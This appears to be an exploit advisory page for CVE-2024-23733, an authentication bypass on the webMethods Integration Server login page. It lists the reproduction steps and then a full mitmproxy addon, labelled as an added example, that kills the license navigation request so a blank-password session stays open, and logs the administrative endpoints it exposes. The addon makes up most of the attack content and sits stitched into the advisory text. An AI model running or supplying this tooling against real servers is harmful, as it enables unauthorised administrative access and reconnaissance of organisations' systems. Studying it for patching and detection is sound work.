WebMethods Integration Server 10.15.0.0000-0092 Improper Access on Login Page

2025.05.06
Credit: Rasime Ekici
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2024-23733
CWE: N/A

# Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
# Date: 25-01-2024
# Exploit Author: Rasime Ekici
# Vendor Homepage: www.softwareag.com
# Version: 10.15.0000-0092
# Tested on: 10.15.0000-0092
# CVE : CVE-2024-23733

Description:
The /WmAdmin/ and /invoke/vm.server/login login page of the Integration Server in Software AG webMethods 10.15.0 before Core Fix7 allows remote attackers to reach the administration panel and discover the server hostname and version information by sending an arbitrary username and a blank password to the /WmAdmin/#/login/ URI.

Steps to reproduce:
1. Intercept the HTTP traffic with a proxy and submit a dummy username with a blank password on the login screen.
2. Drop the request to "/admin/navigation/license" so that the session is not logged out.

You may then be able to see:
- the real hostname of the installed server
- version information
- administrative API endpoints
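The step above that matters is dropping the "/admin/navigation/license" request while letting the rest of the UI traffic through. The following is an added example, not code from the advisory or from Software AG: a small mitmproxy addon that kills exactly that request and records which other /admin/ paths the UI requests afterwards, so the tester gets the list of administrative endpoints the advisory says become visible. The host filter, the assumption that the administrative API lives under /admin/, and the `simulate` helper with its constructed request tuples are mine; the path to drop and the login URI are the ones the advisory names.

```python
"""mitmproxy addon for the WmAdmin login-bypass check (added example).

Run as:  mitmproxy -s wmadmin_drop_license.py
Then submit a dummy username with a blank password on /WmAdmin/#/login/ through
the proxy. The request to /admin/navigation/license is killed, so the UI is not
logged out; every other /admin/ path the UI then calls is recorded.
"""
from typing import List, Optional, Tuple

# Path the advisory says must be dropped so the session is not logged out.
DROP_PATH = "/admin/navigation/license"
# Login endpoint named in the advisory (kept for reference / filtering).
LOGIN_PATH = "/invoke/vm.server/login"
# Assumption for this example: the administrative API sits under /admin/.
ADMIN_PREFIX = "/admin/"
# Optional host filter (assumption); None means match on any host.
TARGET_HOST: Optional[str] = None


def _clean_path(path: str) -> str:
    """Strip query string and trailing slash so matching is exact but tolerant."""
    return path.split("?", 1)[0].rstrip("/")


def should_drop(method: str, path: str, host: Optional[str] = None) -> bool:
    """True when the request is the license navigation call that must be killed."""
    if TARGET_HOST is not None and host != TARGET_HOST:
        return False
    return _clean_path(path) == DROP_PATH


def is_admin_call(path: str) -> bool:
    """True for administrative API calls we want to record (not the dropped one)."""
    return path.startswith(ADMIN_PREFIX) and not should_drop("", path)


class DropLicenseNavigation:
    """mitmproxy addon: kill the license request, log other admin endpoints."""

    def __init__(self) -> None:
        self.dropped: List[Tuple[str, str]] = []   # (method, path) we killed
        self.admin_paths: List[str] = []            # admin endpoints seen

    def request(self, flow) -> None:
        # mitmproxy calls this for every client request; flow is an HTTPFlow.
        req = flow.request
        if should_drop(req.method, req.path, req.host):
            self.dropped.append((req.method, req.path))
            flow.kill()  # client gets no response, so the UI never logs out
        elif is_admin_call(req.path):
            self.admin_paths.append(_clean_path(req.path))


addons = [DropLicenseNavigation()]


# --- offline stand-ins so the addon logic can be exercised without mitmproxy ---
class _FakeRequest:
    def __init__(self, method: str, path: str, host: str) -> None:
        self.method, self.path, self.host = method, path, host


class _FakeFlow:
    def __init__(self, req: _FakeRequest) -> None:
        self.request = req
        self.killed = False

    def kill(self) -> None:
        self.killed = True


def simulate(requests: List[Tuple[str, str, str]]):
    """Run the addon over constructed (method, path, host) tuples offline."""
    addon = DropLicenseNavigation()
    for method, path, host in requests:
        addon.request(_FakeFlow(_FakeRequest(method, path, host)))
    return addon.dropped, addon.admin_paths


if __name__ == "__main__":
    # Constructed traffic, not a capture from a real Integration Server.
    dropped, seen = simulate([
        ("POST", LOGIN_PATH, "target"),
        ("GET", "/admin/navigation/license?ts=1", "target"),
        ("GET", "/admin/example-endpoint", "target"),
    ])
    print("dropped:", dropped)
    print("admin endpoints seen:", seen)
```

The matching is deliberately exact on the path (query string and trailing slash ignored) rather than a prefix match, so a sibling path such as /admin/navigation/licenses would still pass through and the test only removes the single call the advisory identifies.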


Copyright 2025, cxsecurity.com
